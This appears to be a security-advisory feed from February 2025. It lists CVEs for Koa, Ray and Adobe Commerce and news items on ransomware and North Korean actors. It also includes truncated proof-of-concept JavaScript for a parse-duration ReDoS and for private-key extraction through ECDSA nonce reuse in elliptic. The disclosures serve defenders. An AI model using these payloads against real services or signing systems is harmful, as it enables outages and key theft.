CVE-2025-25200
Description: Summary
Koa parses the X-Forwarded-Proto and X-Forwarded-Host HTTP headers with a regular expression that is vulnerable to catastrophic backtracking (an "evil regex"). This can be exploited to carry out a Denial-of-Service attack.
PoC
Coming soon.
Impact
This is a regular-expression Denial-of-Service (ReDoS) that leads to memory exhaustion. The regex should be improved, and empty header values should not be allowed.
References
https://github.com/koajs/koa/security/advisories/GHSA-593f-38f6-jp5m
https://nvd.nist.gov/vuln/detail/CVE-2025-25200
https://github.com/koajs/koa/commit/5054af6e31ffd451a4151a1fe144cef6e5d0d83c
https://github.com/koajs/koa/commit/5f294bb1c7c8d9c61904378d250439a321bffd32
https://github.com/koajs/koa/commit/93fe903fc966635a991bcf890cfc3427d33a1a08
https://github.com/koajs/koa/releases/tag/2.15.4
https://github.com/advisories/GHSA-593f-38f6-jp5m
CVSS: CRITICAL (9.2) EPSS Score: 0.04%
February 12th, 2025
Description: Summary
This report finds two availability issues caused by the regex used in the parse-duration npm package:
- An event loop delay due to the CPU-bound operation of resolving the provided string, ranging from 0.5 ms up to ~50 ms per operation for input sizes from 0.01 MB up to 4.3 MB respectively.
- An out-of-memory condition that crashes a running Node.js application, triggered by a string of roughly 10 MB that uses Unicode characters.
PoC
The following proof-of-concept code provides a test case: it generates stress strings and runs them against the regular expression used in the library.

```js
// Vulnerable regex to use from the library:
import parse from './index.js'

// Build a string of random digits that is periodically interrupted by long runs of
// dots; the dot runs are what the library's regex backtracks over.
function generateStressTestString(length, decimalProbability) {
  let result = "";
  for (let i = 0; i < length; i++) {
    if (Math.random() < decimalProbability) {
      result += "....".repeat(99);
    }
    result += Math.floor(Math.random() * 10);
  }
  return result;
}

// Report the UTF-8 encoded size of a string in MB.
function getStringSizeInMB_UTF8(str) {
  const sizeInBytes = Buffer.byteLength(str, 'utf8');
  const sizeInMB = sizeInBytes / (1024 * 1024);
  return sizeInMB;
}

// Generate test strings with varying length and decimal probability:
const longString1 = generateStressTestString(380, 0.05);
const longString2 = generateStressTestString(10000, 0.9);
const longString3 = generateStressTestString(500000, 1);
const longStringVar1 = '-1e' + '-----'.repeat(915000)
const longStringVar2 = "1" + "0".repeat(500) + "e1" + "α".repeat(52250...
```
February 12th, 2025
[elliptic] Elliptic's private key extraction in ECDSA upon signing a malformed input (e.g. a string)
Description: Summary
The private key can be extracted from an ECDSA signature when a malformed input (e.g. a string or a number) is signed; such input could, for example, come from JSON network input.
Note that elliptic by design accepts hex strings as one of the possible input types.
Details
In this code: https://github.com/indutny/elliptic/blob/3e46a48fdd2ef2f89593e5e058d85530578c9761/lib/elliptic/ec/index.js#L100-L107
msg is a BN instance after conversion, but nonce is an array, and different BN instances can produce identical arrays after conversion.
This means the same nonce can be generated for different messages used in the signing process, leading to k reuse, which in turn allows private key extraction from a pair of signatures.
Such a message can be constructed for any already known message/signature pair, so the attack needs only a single malicious message to be signed for full key extraction.
While signing unverified attacker-controlled messages would be problematic in itself (and exploitation requires such a scenario), signing a single message still should not leak the private key.
Message validation could also have the same bug (out of scope for this report, but possible in some situations), which makes this attack more likely when used in a chain.
PoC
k reuse example
```js
// Added import: needed on Node.js versions where the WebCrypto `crypto` global is not defined.
import crypto from 'node:crypto'
import elliptic from 'elliptic'
const { ec: EC } = elliptic

// Random 32-byte private key for the demonstration.
const privateKey = crypto.getRandomValues(new Uint8Array(32))
const curve = 'ed25519' // or any other curve, e.g. secp256k1
const ec = new EC(curve)
const pret...
```
February 12th, 2025
CVE-2024-57000
Description: An issue in Anyscale Inc Ray between v.2.9.3 and v.2.40.0 allows a remote attacker to execute arbitrary code via a crafted script.
References
https://nvd.nist.gov/vuln/detail/CVE-2024-57000
https://github.com/honysyang/Ray.git
https://github.com/advisories/GHSA-xg2h-7cxj-3gvh
EPSS Score: 0.04%
February 12th, 2025
Description: US, UK, and Australian law enforcement have targeted a company called Zservers (and two of its administrators) for providing bulletproof hosting services to the infamous ransomware gang.
February 12th, 2025
Description: A relatively new ransomware operation named 'Sarcoma' has claimed responsibility for an attack against the Unimicron printed circuit boards (PCB) maker in Taiwan. [...]
February 12th, 2025
Description: North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired by the now widespread ClickFix campaigns. [...]
February 12th, 2025
CVE-2025-24434
Description: Adobe Commerce versions 2.4.7-beta1, 2.4.7-p3, 2.4.6-p8, 2.4.5-p10, 2.4.4-p11 and earlier are affected by an Improper Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. A successful attacker can abuse this to achieve session takeover, raising the confidentiality and integrity impact to high.
References
https://nvd.nist.gov/vuln/detail/CVE-2025-24434
https://helpx.adobe.com/security/products/magento/apsb25-08.html
https://github.com/advisories/GHSA-fppq-f2m6-xv5c
CVSS: CRITICAL (9.1) EPSS Score: 0.05%
February 12th, 2025